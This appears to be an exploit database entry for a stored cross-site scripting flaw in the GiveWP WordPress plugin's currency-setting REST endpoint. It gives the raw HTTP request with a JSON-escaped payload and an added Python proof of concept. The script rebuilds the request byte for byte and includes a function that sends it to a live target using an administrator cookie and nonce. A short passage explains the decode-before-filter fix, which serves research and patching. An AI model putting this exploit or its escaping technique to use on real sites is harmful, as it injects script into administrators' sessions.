## https://sploitus.com/exploit?id=WPEX-ID:DAA9B6C1-1EE1-434C-9F88-FD273B7E20BB
Get a REST nonce while logged in as an administrator: `https://example.com/wp-admin/admin-ajax.php?action=rest-nonce` (the returned value goes into `_wpnonce` below; `[admin+]` stands for that administrator session cookie).

```http
POST /?rest_route=/give-api/v2/onboarding/settings/currency HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 149
Connection: close
Cookie: [admin+]

_wpnonce=fdde54ee91&value=%22%5c%75%30%30%32%32%5c%75%30%30%33%63%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e%22
```

The `value` parameter decodes to the JSON string `"\u0022\u003cimg src=x onerror=alert(1)>"`: the `"` and `<` are written as JSON `\u` escapes, so the raw form value contains no HTML metacharacters and only becomes `"<img src=x onerror=alert(1)>` once it is JSON-decoded. The stored XSS then fires when an administrator edits, views or previews any Donation form.
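The request above rebuilt in code, as an added example that is not part of the sploitus page or of GiveWP: it constructs the exact `value` parameter shown (the test of equality with the page's bytes is the check), and illustrates why a filter that strips tags from the *raw* form value before JSON decoding lets the `\u0022`/`\u003c` escapes through. The `naive_sanitize` filter, the target URL, the cookie and the nonce are assumptions for illustration, not the plugin's code.

```python
"""Rebuilds the GiveWP currency-setting XSS request and demonstrates the
filter-before-decode ordering the payload relies on.
Added example; the sanitiser below is a simplified stand-in, not GiveWP code."""
import json
import re
import urllib.request

# The HTML that the browser ends up with after the stored value is JSON-decoded.
XSS_HTML = '<img src=x onerror=alert(1)>'


def json_escape_payload(html: str) -> str:
    """Wrap `html` in a JSON string, writing the characters a sanitiser looks
    for ('"' and '<') as JSON \\uXXXX escapes.  The leading \\u0022 matches the
    page's payload (a quote that closes whatever attribute the value lands in).
    Backslashes are taken literally, as on the page."""
    inner = html.replace('"', r'\u0022').replace('<', r'\u003c')
    return '"' + r'\u0022' + inner + '"'


def percent_encode_all(s: str) -> str:
    """Percent-encode every byte with lower-case hex, exactly as the captured
    request does (urllib.parse.quote would leave letters and digits bare)."""
    return ''.join('%%%02x' % b for b in s.encode())


def build_body(nonce: str, html: str = XSS_HTML) -> str:
    """Form body for POST /?rest_route=/give-api/v2/onboarding/settings/currency."""
    return '_wpnonce=' + nonce + '&value=' + percent_encode_all(json_escape_payload(html))


def naive_sanitize(s: str) -> str:
    """Assumed stand-in for a text filter: strip anything tag-shaped, then
    neutralise any stray '<'.  This is NOT the plugin's own sanitiser."""
    s = re.sub(r'<[^>]*>', '', s)
    return s.replace('<', '&lt;')


def filter_then_decode(raw: str) -> str:
    """Vulnerable order: sanitise the raw form value, then JSON-decode it.
    The raw value holds no '<', so the filter is a no-op and json.loads
    produces live HTML."""
    return json.loads(naive_sanitize(raw))


def decode_then_filter(raw: str) -> str:
    """Safe order: JSON-decode first, then sanitise the resulting string,
    so the escapes have already been turned into characters the filter sees."""
    return naive_sanitize(json.loads(raw))


def send_poc(base_url: str, admin_cookie: str, nonce: str) -> int:
    """Send the request against a live target (placeholder arguments are
    assumptions); returns the HTTP status code.  Not run by the tests."""
    req = urllib.request.Request(
        base_url.rstrip('/') + '/?rest_route=/give-api/v2/onboarding/settings/currency',
        data=build_body(nonce).encode(),
        method='POST',
        headers={
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'X-Requested-With': 'XMLHttpRequest',
            'Accept': 'application/json, text/javascript, */*; q=0.01',
            'Cookie': admin_cookie,
        },
    )
    with urllib.request.urlopen(req) as resp:  # nosec: PoC against a lab target only
        return resp.status


if __name__ == '__main__':
    raw = json_escape_payload(XSS_HTML)
    print('raw form value  :', raw)
    print('filter->decode  :', filter_then_decode(raw))   # live <img ...> survives
    print('decode->filter  :', decode_then_filter(raw))   # tag stripped
    print('request body    :', build_body('fdde54ee91'))
```

`build_body('fdde54ee91')` reproduces the 149-byte body from the capture byte for byte. The two ordering functions make the point the payload relies on: any check that runs on the raw `value` string before `json_decode` never sees a `<` or `"`, so the fix has to validate the decoded value (or reject anything but a plain currency code outright).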